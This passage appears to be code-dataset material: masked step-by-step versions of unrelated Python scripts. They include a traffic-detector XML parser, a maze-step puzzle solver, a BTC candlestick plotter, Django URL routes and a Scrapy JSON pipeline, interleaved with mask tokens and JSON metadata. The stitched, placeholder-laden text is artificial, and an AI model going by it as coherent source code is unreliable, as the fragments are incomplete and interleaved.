"step-5": "import os\nfrom xml.dom import minidom\nimport numpy as np\n\n\ndef get_branches_dir(root_dir):\n branches_dir = []\n folds = os.listdir(root_dir)\n while folds:\n branch_dir = root_dir + '/' + folds.pop()\n branches_dir.append(branch_dir)\n return branches_dir\n\n\ndef tolist(xml, detname):\n try:\n data = minidom.parse(xml)\n except:\n print('parse error')\n ErrorFiles.append(xml)\n return\n\n detectors = data.documentElement\n date = detectors.getElementsByTagName('date')[0].childNodes[0].data\n time = detectors.getElementsByTagName('time')[0].childNodes[0].data\n dets = detectors.getElementsByTagName('detector')\n laneVolume = 0\n laneOccupancy = 0\n laneSpeed = 0\n for det in dets:\n try:\n detectorID = det.getElementsByTagName('detector-Id')[0]\n except IndexError:\n continue\n # print\"\\ndetector-Id: %s\" % detectorID.childNodes[0].data\n if detectorID.childNodes[0].data in detname:\n lanes = det.getElementsByTagName('lane')\n for lane in lanes:\n # laneNumber = lane.getElementsByTagName('lane-Number')[0]\n laneStatus = lane.getElementsByTagName('lane-Status')[0]\n if laneStatus.childNodes[0].data == \"OK\":\n try:\n laneVolume += int(lane.getElementsByTagName('lane-Volume')[0].childNodes[0].data)\n laneOccupancy += int(lane.getElementsByTagName('lane-Occupancy')[0].childNodes[0].data) * int(lane.getElementsByTagName('lane-Volume')[0].childNodes[0].data)\n laneSpeed += int(lane.getElementsByTagName('lane-Speed')[0].childNodes[0].data) * int(lane.getElementsByTagName('lane-Volume')[0].childNodes[0].data)\n except IndexError:\n break\n else:\n break\n\n if laneVolume > 0:\n for i in range(0, len(detname)):\n if detectorID.childNodes[0].data == detname[i]:\n c = i\n detectorData[c][0].append(date)\n detectorData[c][1].append(time)\n detectorData[c][2].append(laneVolume)\n detectorData[c][3].append(laneOccupancy/float(laneVolume))\n detectorData[c][4].append(laneSpeed/float(laneVolume))\n\n\nmonth_dir = 'C:/Users/ccrxf/PycharmProjects/FDA/07'\nos.chdir(month_dir) # change the current working directory to path.\nday_dir = get_branches_dir(month_dir)\ndetNames = ['MI255E000.0D', 'MI270S013.6D', 'MI070E210.0D', 'MI070E243.9D', 'MI044E250.8D', 'MI044E246.6D']\nErrorFiles = []\nfor dayFile in day_dir:\n detectorData = [[[], [], [], [], []], [[], [], [], [], []], [[], [], [], [], []], [[], [], [], [], []], [[], [], [], [], []], [[], [], [], [], []]]\n xmlFiles = get_branches_dir(dayFile)\n for xml in xmlFiles:\n if not os.path.isdir(xml):\n print(xml)\n tolist(xml, detNames)\n\n for i in range(0, len(detNames)):\n m = np.array(detectorData[i])\n os.chdir('C:/Users/ccrxf/PycharmProjects/FDA/npfiles/'+detNames[i])\n np.save(detectorData[0][0][0]+'.npy', m)\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
log.uploadLogs(4)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
log = LogUpload()
log.uploadLogs(4)
<|reserved_special_token_1|>
from logupload import *
log = LogUpload()
log.uploadLogs(4)
|
flexible
|
{
"blob_id": "421837698b7fc188c84a3221271f11a40d1625d9",
"index": 7280,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nlog.uploadLogs(4)\n",
"step-3": "<mask token>\nlog = LogUpload()\nlog.uploadLogs(4)\n",
"step-4": "from logupload import *\nlog = LogUpload()\nlog.uploadLogs(4)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# maze = [0, 3, 0, 1, -3]
with open('./day_5/input.txt') as f:
maze = f.readlines()
f.close
maze = [int(line.strip()) for line in maze]
# I think I will just expand on the original functions
# from now on rather than separating part one from two
def escape_maze(maze):
end = len(maze) - 1
step_counter = 0
offset = 0
while True:
cur_index = offset
offset = offset + maze[cur_index]
if maze[cur_index] >= 3:
maze[cur_index] = maze[cur_index] - 1
else:
maze[cur_index] = maze[cur_index] + 1
step_counter += 1
if offset > end:
return step_counter
print(escape_maze(maze))
|
normal
|
{
"blob_id": "a4dfac7e15064d92c806a4e3f972f06e4dca6b11",
"index": 5181,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef escape_maze(maze):\n end = len(maze) - 1\n step_counter = 0\n offset = 0\n while True:\n cur_index = offset\n offset = offset + maze[cur_index]\n if maze[cur_index] >= 3:\n maze[cur_index] = maze[cur_index] - 1\n else:\n maze[cur_index] = maze[cur_index] + 1\n step_counter += 1\n if offset > end:\n return step_counter\n\n\n<mask token>\n",
"step-3": "with open('./day_5/input.txt') as f:\n maze = f.readlines()\nf.close\n<mask token>\n\n\ndef escape_maze(maze):\n end = len(maze) - 1\n step_counter = 0\n offset = 0\n while True:\n cur_index = offset\n offset = offset + maze[cur_index]\n if maze[cur_index] >= 3:\n maze[cur_index] = maze[cur_index] - 1\n else:\n maze[cur_index] = maze[cur_index] + 1\n step_counter += 1\n if offset > end:\n return step_counter\n\n\nprint(escape_maze(maze))\n",
"step-4": "with open('./day_5/input.txt') as f:\n maze = f.readlines()\nf.close\nmaze = [int(line.strip()) for line in maze]\n\n\ndef escape_maze(maze):\n end = len(maze) - 1\n step_counter = 0\n offset = 0\n while True:\n cur_index = offset\n offset = offset + maze[cur_index]\n if maze[cur_index] >= 3:\n maze[cur_index] = maze[cur_index] - 1\n else:\n maze[cur_index] = maze[cur_index] + 1\n step_counter += 1\n if offset > end:\n return step_counter\n\n\nprint(escape_maze(maze))\n",
"step-5": "# maze = [0, 3, 0, 1, -3]\nwith open('./day_5/input.txt') as f:\n maze = f.readlines()\nf.close\nmaze = [int(line.strip()) for line in maze]\n\n# I think I will just expand on the original functions\n# from now on rather than separating part one from two\ndef escape_maze(maze):\n end = len(maze) - 1\n step_counter = 0\n offset = 0\n\n while True:\n cur_index = offset\n offset = offset + maze[cur_index]\n if maze[cur_index] >= 3:\n maze[cur_index] = maze[cur_index] - 1\n else:\n maze[cur_index] = maze[cur_index] + 1\n step_counter += 1\n if offset > end:\n return step_counter\n\n\nprint(escape_maze(maze))",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for cnt in range(20, len(rows)):
row_previous2 = rows[cnt - 2]
row_previous1 = rows[cnt - 1]
row = rows[cnt]
open = row[2]
high = row[3]
low = row[4]
close = row[5]
vol = row[6]
vol_buy, vol_sell = row[7:9]
avg_buy, avg_sell, avg_amount_per_trade = row[-3:]
date = date + 1
data = date, open, high, low, close
alist.append(data)
vols_bid.append(-vol_buy)
vols_ask.append(vol_sell)
diff_bid_2_ask.append(vol_buy - vol_sell)
diff_bid_2_ask_in_past_2_epochs.append(vol_buy + row_previous1[7] -
vol_sell - row_previous1[8])
diff_bid_2_ask_in_past_3_epochs.append(vol_buy + row_previous1[7] +
row_previous2[7] - vol_sell - row_previous1[8] - row_previous2[8])
avg_buy_diff_sell.append(avg_buy - avg_sell)
avg_amounts.append(avg_amount_per_trade * 100)
dates.append(date)
<|reserved_special_token_0|>
mpf.candlestick_ohlc(axes[0], alist, width=0.5, colorup='g', colordown='r')
axes[0].set_title('BTC')
axes[0].set_ylabel('价格')
axes[0].grid(True)
axes[0].xaxis_date()
axes[1].plot(dates, avg_buy_diff_sell, c='orange')
axes[1].plot(dates, avg_amounts, c='blue')
axes[1].set_ylabel('成交量')
axes[1].grid(True)
axes[2].plot(dates, diff_bid_2_ask, c='green')
axes[2].plot(dates, diff_bid_2_ask_in_past_2_epochs, c='orange')
axes[2].plot(dates, diff_bid_2_ask_in_past_3_epochs, c='blue')
axes[2].set_ylabel('成交量')
axes[2].grid(True)
axes[2].set_ylabel('买卖均价')
axes[2].grid(True)
plt.show()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
pgmanager = DB.PGManager(**CONSTANTS.DB_CONNECT_ARGS_LOCAL)
tablename = 'klines_full_vol_50'
rows = pgmanager.select('select * from ' + tablename +
' where timestamp>1577808000+86400*5 order by timestamp limit 300')
a = 1
alist = []
vols_bid = []
vols_ask = []
diff_bid_2_ask = []
diff_bid_2_ask_in_past_2_epochs = []
diff_bid_2_ask_in_past_3_epochs = []
diff_bid_2_ask_in_past_5_epochs = []
diff_bid_2_ask_in_past_10_epochs = []
diff_bid_2_ask_in_past_20_epochs = []
avg_buys = []
avg_sells = []
avg_buy_diff_sell = []
avg_amounts = []
dates = []
cnt = 0
date = date2num(datetime.datetime.fromtimestamp(rows[0][1]))
for cnt in range(20, len(rows)):
row_previous2 = rows[cnt - 2]
row_previous1 = rows[cnt - 1]
row = rows[cnt]
open = row[2]
high = row[3]
low = row[4]
close = row[5]
vol = row[6]
vol_buy, vol_sell = row[7:9]
avg_buy, avg_sell, avg_amount_per_trade = row[-3:]
date = date + 1
data = date, open, high, low, close
alist.append(data)
vols_bid.append(-vol_buy)
vols_ask.append(vol_sell)
diff_bid_2_ask.append(vol_buy - vol_sell)
diff_bid_2_ask_in_past_2_epochs.append(vol_buy + row_previous1[7] -
vol_sell - row_previous1[8])
diff_bid_2_ask_in_past_3_epochs.append(vol_buy + row_previous1[7] +
row_previous2[7] - vol_sell - row_previous1[8] - row_previous2[8])
avg_buy_diff_sell.append(avg_buy - avg_sell)
avg_amounts.append(avg_amount_per_trade * 100)
dates.append(date)
fig, axes = plt.subplots(3, sharex=True, figsize=(64, 30))
mpf.candlestick_ohlc(axes[0], alist, width=0.5, colorup='g', colordown='r')
axes[0].set_title('BTC')
axes[0].set_ylabel('价格')
axes[0].grid(True)
axes[0].xaxis_date()
axes[1].plot(dates, avg_buy_diff_sell, c='orange')
axes[1].plot(dates, avg_amounts, c='blue')
axes[1].set_ylabel('成交量')
axes[1].grid(True)
axes[2].plot(dates, diff_bid_2_ask, c='green')
axes[2].plot(dates, diff_bid_2_ask_in_past_2_epochs, c='orange')
axes[2].plot(dates, diff_bid_2_ask_in_past_3_epochs, c='blue')
axes[2].set_ylabel('成交量')
axes[2].grid(True)
axes[2].set_ylabel('买卖均价')
axes[2].grid(True)
plt.show()
<|reserved_special_token_1|>
from packages import data as DATA
from packages import plot as PLOT
from packages import universal as UNIVERSAL
from packages import currency_pair as CP
import matplotlib.pyplot as plt
import mpl_finance as mpf
from packages import db as DB
import CONSTANTS
import datetime
from matplotlib.pylab import date2num
from matplotlib.widgets import Cursor
pgmanager = DB.PGManager(**CONSTANTS.DB_CONNECT_ARGS_LOCAL)
tablename = 'klines_full_vol_50'
rows = pgmanager.select('select * from ' + tablename +
' where timestamp>1577808000+86400*5 order by timestamp limit 300')
a = 1
alist = []
vols_bid = []
vols_ask = []
diff_bid_2_ask = []
diff_bid_2_ask_in_past_2_epochs = []
diff_bid_2_ask_in_past_3_epochs = []
diff_bid_2_ask_in_past_5_epochs = []
diff_bid_2_ask_in_past_10_epochs = []
diff_bid_2_ask_in_past_20_epochs = []
avg_buys = []
avg_sells = []
avg_buy_diff_sell = []
avg_amounts = []
dates = []
cnt = 0
date = date2num(datetime.datetime.fromtimestamp(rows[0][1]))
for cnt in range(20, len(rows)):
row_previous2 = rows[cnt - 2]
row_previous1 = rows[cnt - 1]
row = rows[cnt]
open = row[2]
high = row[3]
low = row[4]
close = row[5]
vol = row[6]
vol_buy, vol_sell = row[7:9]
avg_buy, avg_sell, avg_amount_per_trade = row[-3:]
date = date + 1
data = date, open, high, low, close
alist.append(data)
vols_bid.append(-vol_buy)
vols_ask.append(vol_sell)
diff_bid_2_ask.append(vol_buy - vol_sell)
diff_bid_2_ask_in_past_2_epochs.append(vol_buy + row_previous1[7] -
vol_sell - row_previous1[8])
diff_bid_2_ask_in_past_3_epochs.append(vol_buy + row_previous1[7] +
row_previous2[7] - vol_sell - row_previous1[8] - row_previous2[8])
avg_buy_diff_sell.append(avg_buy - avg_sell)
avg_amounts.append(avg_amount_per_trade * 100)
dates.append(date)
fig, axes = plt.subplots(3, sharex=True, figsize=(64, 30))
mpf.candlestick_ohlc(axes[0], alist, width=0.5, colorup='g', colordown='r')
axes[0].set_title('BTC')
axes[0].set_ylabel('价格')
axes[0].grid(True)
axes[0].xaxis_date()
axes[1].plot(dates, avg_buy_diff_sell, c='orange')
axes[1].plot(dates, avg_amounts, c='blue')
axes[1].set_ylabel('买卖均价')  # this panel plots avg buy/sell price diff and per-trade amount
axes[1].grid(True)
axes[2].plot(dates, diff_bid_2_ask, c='green')
axes[2].plot(dates, diff_bid_2_ask_in_past_2_epochs, c='orange')
axes[2].plot(dates, diff_bid_2_ask_in_past_3_epochs, c='blue')
axes[2].set_ylabel('成交量')  # buy-minus-sell volume imbalance
axes[2].grid(True)
plt.show()
<|reserved_special_token_1|>
from packages import data as DATA
from packages import plot as PLOT
from packages import universal as UNIVERSAL
from packages import currency_pair as CP
import matplotlib.pyplot as plt
import mpl_finance as mpf
from packages import db as DB
import CONSTANTS
import datetime
from matplotlib.pylab import date2num
from matplotlib.widgets import Cursor
pgmanager=DB.PGManager(**CONSTANTS.DB_CONNECT_ARGS_LOCAL)
tablename='klines_full_vol_50'
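# pull 300 kline rows ordered by timestamp, starting 5 days after epoch 1577808000 (2020-01-01 00:00 UTC+8)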
rows=pgmanager.select('select * from '+tablename + ' where timestamp>1577808000+86400*5 order by timestamp limit 300')
a=1
alist = []
vols_bid = []
vols_ask = []
diff_bid_2_ask = []
diff_bid_2_ask_in_past_2_epochs = []
diff_bid_2_ask_in_past_3_epochs = []
diff_bid_2_ask_in_past_5_epochs = []
diff_bid_2_ask_in_past_10_epochs = []
diff_bid_2_ask_in_past_20_epochs = []
avg_buys=[]
avg_sells=[]
avg_buy_diff_sell=[]
avg_amounts=[]
dates = []
cnt = 0
date = date2num(datetime.datetime.fromtimestamp(rows[0][1]))
for cnt in range(20, len(rows)):
row_previous2=rows[cnt-2]
row_previous1 = rows[cnt - 1]
row = rows[cnt]
open=row[2]
high=row[3]
low=row[4]
close=row[5]
vol=row[6]
vol_buy,vol_sell=row[7:9]
avg_buy, avg_sell, avg_amount_per_trade=row[-3:]
date = date + 1
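    # note: the x position advances one matplotlib day per row, not by the real timestamp gap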
data = (date, open, high, low, close)
alist.append(data)
vols_bid.append(-vol_buy)
vols_ask.append(vol_sell)
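    # net buy-minus-sell volume for the current bar and rolling 2-/3-bar windows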
diff_bid_2_ask.append(vol_buy-vol_sell)
diff_bid_2_ask_in_past_2_epochs.append(
vol_buy + row_previous1[7] - vol_sell-row_previous1[8])
diff_bid_2_ask_in_past_3_epochs.append(
vol_buy + row_previous1[7] +row_previous2[7] - vol_sell-row_previous1[8]-row_previous2[8])
avg_buy_diff_sell.append(avg_buy-avg_sell)
avg_amounts.append(avg_amount_per_trade*100)
dates.append(date)
# fig, ax = plt.subplots(figsize=(32, 18))
# fig.subplots_adjust(bottom=0.5)
# mpf.candlestick_ohlc(ax, alist, width=0.5, colorup='g', colordown='r', alpha=1.0)
# plt.grid(True)
# # rotate the date tick labels
# plt.xticks(rotation=30)
# plt.title('wanda yuanxian 17')
# plt.xlabel('Date')
# plt.ylabel('Price')
# # use dates for the x-axis ticks
# ax.xaxis_date()
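# three stacked panels sharing one x-axis: candlesticks, per-trade averages, volume imbalance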
fig, axes = plt.subplots(3, sharex=True, figsize=(64, 30))
mpf.candlestick_ohlc(axes[0], alist, width=0.5, colorup='g', colordown='r')
axes[0].set_title('BTC')
axes[0].set_ylabel('价格')
axes[0].grid(True)
axes[0].xaxis_date()
# axes[1].plot(dates, avg_buy_diff_sell,c='red',linewidth=0.5)
# axes[1].plot(dates, avg_amounts,c='green', linewidth=0.5)
# axes[1].grid(True)
axes[1].plot(dates, avg_buy_diff_sell, c='orange')
axes[1].plot(dates, avg_amounts, c='blue')
axes[1].set_ylabel('买卖均价')  # this panel plots avg buy/sell price diff and per-trade amount
axes[1].grid(True)
axes[2].plot(dates, diff_bid_2_ask, c='green')
axes[2].plot(dates, diff_bid_2_ask_in_past_2_epochs, c='orange')
axes[2].plot(dates, diff_bid_2_ask_in_past_3_epochs, c='blue')
axes[2].set_ylabel('成交量')  # buy-minus-sell volume imbalance
axes[2].grid(True)
plt.show()
|
flexible
|
{
"blob_id": "9aaaa744780dbd32b14e09a34976a2a0a3ce34f7",
"index": 7864,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor cnt in range(20, len(rows)):\n row_previous2 = rows[cnt - 2]\n row_previous1 = rows[cnt - 1]\n row = rows[cnt]\n open = row[2]\n high = row[3]\n low = row[4]\n close = row[5]\n vol = row[6]\n vol_buy, vol_sell = row[7:9]\n avg_buy, avg_sell, avg_amount_per_trade = row[-3:]\n date = date + 1\n data = date, open, high, low, close\n alist.append(data)\n vols_bid.append(-vol_buy)\n vols_ask.append(vol_sell)\n diff_bid_2_ask.append(vol_buy - vol_sell)\n diff_bid_2_ask_in_past_2_epochs.append(vol_buy + row_previous1[7] -\n vol_sell - row_previous1[8])\n diff_bid_2_ask_in_past_3_epochs.append(vol_buy + row_previous1[7] +\n row_previous2[7] - vol_sell - row_previous1[8] - row_previous2[8])\n avg_buy_diff_sell.append(avg_buy - avg_sell)\n avg_amounts.append(avg_amount_per_trade * 100)\n dates.append(date)\n<mask token>\nmpf.candlestick_ohlc(axes[0], alist, width=0.5, colorup='g', colordown='r')\naxes[0].set_title('BTC')\naxes[0].set_ylabel('价格')\naxes[0].grid(True)\naxes[0].xaxis_date()\naxes[1].plot(dates, avg_buy_diff_sell, c='orange')\naxes[1].plot(dates, avg_amounts, c='blue')\naxes[1].set_ylabel('成交量')\naxes[1].grid(True)\naxes[2].plot(dates, diff_bid_2_ask, c='green')\naxes[2].plot(dates, diff_bid_2_ask_in_past_2_epochs, c='orange')\naxes[2].plot(dates, diff_bid_2_ask_in_past_3_epochs, c='blue')\naxes[2].set_ylabel('成交量')\naxes[2].grid(True)\naxes[2].set_ylabel('买卖均价')\naxes[2].grid(True)\nplt.show()\n",
"step-3": "<mask token>\npgmanager = DB.PGManager(**CONSTANTS.DB_CONNECT_ARGS_LOCAL)\ntablename = 'klines_full_vol_50'\nrows = pgmanager.select('select * from ' + tablename +\n ' where timestamp>1577808000+86400*5 order by timestamp limit 300')\na = 1\nalist = []\nvols_bid = []\nvols_ask = []\ndiff_bid_2_ask = []\ndiff_bid_2_ask_in_past_2_epochs = []\ndiff_bid_2_ask_in_past_3_epochs = []\ndiff_bid_2_ask_in_past_5_epochs = []\ndiff_bid_2_ask_in_past_10_epochs = []\ndiff_bid_2_ask_in_past_20_epochs = []\navg_buys = []\navg_sells = []\navg_buy_diff_sell = []\navg_amounts = []\ndates = []\ncnt = 0\ndate = date2num(datetime.datetime.fromtimestamp(rows[0][1]))\nfor cnt in range(20, len(rows)):\n row_previous2 = rows[cnt - 2]\n row_previous1 = rows[cnt - 1]\n row = rows[cnt]\n open = row[2]\n high = row[3]\n low = row[4]\n close = row[5]\n vol = row[6]\n vol_buy, vol_sell = row[7:9]\n avg_buy, avg_sell, avg_amount_per_trade = row[-3:]\n date = date + 1\n data = date, open, high, low, close\n alist.append(data)\n vols_bid.append(-vol_buy)\n vols_ask.append(vol_sell)\n diff_bid_2_ask.append(vol_buy - vol_sell)\n diff_bid_2_ask_in_past_2_epochs.append(vol_buy + row_previous1[7] -\n vol_sell - row_previous1[8])\n diff_bid_2_ask_in_past_3_epochs.append(vol_buy + row_previous1[7] +\n row_previous2[7] - vol_sell - row_previous1[8] - row_previous2[8])\n avg_buy_diff_sell.append(avg_buy - avg_sell)\n avg_amounts.append(avg_amount_per_trade * 100)\n dates.append(date)\nfig, axes = plt.subplots(3, sharex=True, figsize=(64, 30))\nmpf.candlestick_ohlc(axes[0], alist, width=0.5, colorup='g', colordown='r')\naxes[0].set_title('BTC')\naxes[0].set_ylabel('价格')\naxes[0].grid(True)\naxes[0].xaxis_date()\naxes[1].plot(dates, avg_buy_diff_sell, c='orange')\naxes[1].plot(dates, avg_amounts, c='blue')\naxes[1].set_ylabel('成交量')\naxes[1].grid(True)\naxes[2].plot(dates, diff_bid_2_ask, c='green')\naxes[2].plot(dates, diff_bid_2_ask_in_past_2_epochs, c='orange')\naxes[2].plot(dates, diff_bid_2_ask_in_past_3_epochs, c='blue')\naxes[2].set_ylabel('成交量')\naxes[2].grid(True)\naxes[2].set_ylabel('买卖均价')\naxes[2].grid(True)\nplt.show()\n",
"step-4": "from packages import data as DATA\nfrom packages import plot as PLOT\nfrom packages import universal as UNIVERSAL\nfrom packages import currency_pair as CP\nimport matplotlib.pyplot as plt\nimport mpl_finance as mpf\nfrom packages import db as DB\nimport CONSTANTS\nimport datetime\nfrom matplotlib.pylab import date2num\nfrom matplotlib.widgets import Cursor\npgmanager = DB.PGManager(**CONSTANTS.DB_CONNECT_ARGS_LOCAL)\ntablename = 'klines_full_vol_50'\nrows = pgmanager.select('select * from ' + tablename +\n ' where timestamp>1577808000+86400*5 order by timestamp limit 300')\na = 1\nalist = []\nvols_bid = []\nvols_ask = []\ndiff_bid_2_ask = []\ndiff_bid_2_ask_in_past_2_epochs = []\ndiff_bid_2_ask_in_past_3_epochs = []\ndiff_bid_2_ask_in_past_5_epochs = []\ndiff_bid_2_ask_in_past_10_epochs = []\ndiff_bid_2_ask_in_past_20_epochs = []\navg_buys = []\navg_sells = []\navg_buy_diff_sell = []\navg_amounts = []\ndates = []\ncnt = 0\ndate = date2num(datetime.datetime.fromtimestamp(rows[0][1]))\nfor cnt in range(20, len(rows)):\n row_previous2 = rows[cnt - 2]\n row_previous1 = rows[cnt - 1]\n row = rows[cnt]\n open = row[2]\n high = row[3]\n low = row[4]\n close = row[5]\n vol = row[6]\n vol_buy, vol_sell = row[7:9]\n avg_buy, avg_sell, avg_amount_per_trade = row[-3:]\n date = date + 1\n data = date, open, high, low, close\n alist.append(data)\n vols_bid.append(-vol_buy)\n vols_ask.append(vol_sell)\n diff_bid_2_ask.append(vol_buy - vol_sell)\n diff_bid_2_ask_in_past_2_epochs.append(vol_buy + row_previous1[7] -\n vol_sell - row_previous1[8])\n diff_bid_2_ask_in_past_3_epochs.append(vol_buy + row_previous1[7] +\n row_previous2[7] - vol_sell - row_previous1[8] - row_previous2[8])\n avg_buy_diff_sell.append(avg_buy - avg_sell)\n avg_amounts.append(avg_amount_per_trade * 100)\n dates.append(date)\nfig, axes = plt.subplots(3, sharex=True, figsize=(64, 30))\nmpf.candlestick_ohlc(axes[0], alist, width=0.5, colorup='g', colordown='r')\naxes[0].set_title('BTC')\naxes[0].set_ylabel('价格')\naxes[0].grid(True)\naxes[0].xaxis_date()\naxes[1].plot(dates, avg_buy_diff_sell, c='orange')\naxes[1].plot(dates, avg_amounts, c='blue')\naxes[1].set_ylabel('成交量')\naxes[1].grid(True)\naxes[2].plot(dates, diff_bid_2_ask, c='green')\naxes[2].plot(dates, diff_bid_2_ask_in_past_2_epochs, c='orange')\naxes[2].plot(dates, diff_bid_2_ask_in_past_3_epochs, c='blue')\naxes[2].set_ylabel('成交量')\naxes[2].grid(True)\naxes[2].set_ylabel('买卖均价')\naxes[2].grid(True)\nplt.show()\n",
"step-5": "from packages import data as DATA\nfrom packages import plot as PLOT\nfrom packages import universal as UNIVERSAL\nfrom packages import currency_pair as CP\nimport matplotlib.pyplot as plt\nimport mpl_finance as mpf\nfrom packages import db as DB\nimport CONSTANTS\nimport datetime\nfrom matplotlib.pylab import date2num\nfrom matplotlib.widgets import Cursor\n\npgmanager=DB.PGManager(**CONSTANTS.DB_CONNECT_ARGS_LOCAL)\ntablename='klines_full_vol_50'\n\nrows=pgmanager.select('select * from '+tablename + ' where timestamp>1577808000+86400*5 order by timestamp limit 300')\na=1\n\nalist = []\nvols_bid = []\nvols_ask = []\ndiff_bid_2_ask = []\ndiff_bid_2_ask_in_past_2_epochs = []\ndiff_bid_2_ask_in_past_3_epochs = []\ndiff_bid_2_ask_in_past_5_epochs = []\ndiff_bid_2_ask_in_past_10_epochs = []\ndiff_bid_2_ask_in_past_20_epochs = []\navg_buys=[]\navg_sells=[]\navg_buy_diff_sell=[]\navg_amounts=[]\ndates = []\ncnt = 0\ndate = date2num(datetime.datetime.fromtimestamp(rows[0][1]))\n\nfor cnt in range(20, len(rows)):\n row_previous2=rows[cnt-2]\n row_previous1 = rows[cnt - 1]\n row = rows[cnt]\n open=row[2]\n high=row[3]\n low=row[4]\n close=row[5]\n vol=row[6]\n vol_buy,vol_sell=row[7:9]\n avg_buy, avg_sell, avg_amount_per_trade=row[-3:]\n date = date + 1\n data = (date, open, high, low, close)\n alist.append(data)\n vols_bid.append(-vol_buy)\n vols_ask.append(vol_sell)\n diff_bid_2_ask.append(vol_buy-vol_sell)\n diff_bid_2_ask_in_past_2_epochs.append(\n vol_buy + row_previous1[7] - vol_sell-row_previous1[8])\n diff_bid_2_ask_in_past_3_epochs.append(\n vol_buy + row_previous1[7] +row_previous2[7] - vol_sell-row_previous1[8]-row_previous2[8])\n avg_buy_diff_sell.append(avg_buy-avg_sell)\n avg_amounts.append(avg_amount_per_trade*100)\n dates.append(date)\n\n# fig, ax = plt.subplots(figsize=(32, 18))\n# fig.subplots_adjust(bottom=0.5)\n# mpf.candlestick_ohlc(ax, alist, width=0.5, colorup='g', colordown='r', alpha=1.0)\n# plt.grid(True)\n# # 设置日期刻度旋转的角度\n# plt.xticks(rotation=30)\n# plt.title('wanda yuanxian 17')\n# plt.xlabel('Date')\n# plt.ylabel('Price')\n# # x轴的刻度为日期\n# ax.xaxis_date()\n\nfig, axes = plt.subplots(3, sharex=True, figsize=(64, 30))\nmpf.candlestick_ohlc(axes[0], alist, width=0.5, colorup='g', colordown='r')\n\naxes[0].set_title('BTC')\naxes[0].set_ylabel('价格')\naxes[0].grid(True)\naxes[0].xaxis_date()\n\n# axes[1].plot(dates, avg_buy_diff_sell,c='red',linewidth=0.5)\n# axes[1].plot(dates, avg_amounts,c='green', linewidth=0.5)\n# axes[1].grid(True)\naxes[1].plot(dates, avg_buy_diff_sell, c='orange')\naxes[1].plot(dates, avg_amounts, c='blue')\naxes[1].set_ylabel('成交量')\naxes[1].grid(True)\n\naxes[2].plot(dates, diff_bid_2_ask, c='green')\naxes[2].plot(dates, diff_bid_2_ask_in_past_2_epochs, c='orange')\naxes[2].plot(dates, diff_bid_2_ask_in_past_3_epochs, c='blue')\naxes[2].set_ylabel('成交量')\naxes[2].grid(True)\n\naxes[2].set_ylabel('买卖均价')\naxes[2].grid(True)\n\nplt.show()",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from django.contrib import admin
from django.urls import path, include
from serverside.router import router
from rest_framework.authtoken import views as auth_views
from . import views
from .views import CustomObtainAuthToken
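# routes: user signup/login, user detail, profile read/update,
# plus read-only charity and category listings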
urlpatterns = [
    path('users/', views.UserCreateAPIView.as_view(), name='user-list'),
    path('users/login/', CustomObtainAuthToken.as_view()),
    path('users/<int:pk>/', views.ReadUserAPIView.as_view()),
    path('users/<int:pk>/profile/', views.ReadUpdateProfileAPIView.as_view()),
    path('charities/', views.ListCharitiesAPIView.as_view()),
    path('categories/', views.ListCategoriesAPIView.as_view()),
]
|
normal
|
{
"blob_id": "49d76458b8adcf6eea9db2ef127609ff96e03ad1",
"index": 6270,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns = [path('users/', views.UserCreateAPIView.as_view(), name=\n 'user-list'), path('users/login/', CustomObtainAuthToken.as_view()),\n path('users/<int:pk>/', views.ReadUserAPIView.as_view()), path(\n 'users/<int:pk>/profile/', views.ReadUpdateProfileAPIView.as_view()),\n path('charities/', views.ListCharitiesAPIView.as_view()), path(\n 'categories/', views.ListCategoriesAPIView.as_view())]\n",
"step-3": "from django.contrib import admin\nfrom django.urls import path, include\nfrom serverside.router import router\nfrom rest_framework.authtoken import views as auth_views\nfrom . import views\nfrom .views import CustomObtainAuthToken\nurlpatterns = [path('users/', views.UserCreateAPIView.as_view(), name=\n 'user-list'), path('users/login/', CustomObtainAuthToken.as_view()),\n path('users/<int:pk>/', views.ReadUserAPIView.as_view()), path(\n 'users/<int:pk>/profile/', views.ReadUpdateProfileAPIView.as_view()),\n path('charities/', views.ListCharitiesAPIView.as_view()), path(\n 'categories/', views.ListCategoriesAPIView.as_view())]\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
# -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
import codecs
import time
import json
import os
class OitYitikuscrapyDataPipeline(object):
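    # writes each scraped item as one JSON line to a per-day, per-spider file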
def open_spider(self, spider):
path ='D:\\xiti10001\\data\\{}\\'.format(time.strftime("%Y%m%d",time.localtime()))
# path = 'd:\\OITData\\zujuan\\{0}\\{1}\\'.format(time.strftime("%Y%m%d", time.localtime()), spider.name)
isExists = os.path.exists(path)
if isExists:
pass
else:
os.makedirs(path)
self.file = codecs.open(path + spider.name+'.json', 'a', encoding='utf-8')
def process_item(self, item, spider):
        print('pipeline processing item from spider:', spider.name)
lines = json.dumps(dict(item), ensure_ascii=False) + '\n'
self.file.write(lines)
return item
def close_spider(self, spider):
self.file.close()
|
normal
|
{
"blob_id": "315996a783d7b95fd87374a8fe2602a572de071e",
"index": 3495,
"step-1": "<mask token>\n\n\nclass OitYitikuscrapyDataPipeline(object):\n\n def open_spider(self, spider):\n path = 'D:\\\\xiti10001\\\\data\\\\{}\\\\'.format(time.strftime('%Y%m%d',\n time.localtime()))\n isExists = os.path.exists(path)\n if isExists:\n pass\n else:\n os.makedirs(path)\n self.file = codecs.open(path + spider.name + '.json', 'a', encoding\n ='utf-8')\n <mask token>\n <mask token>\n",
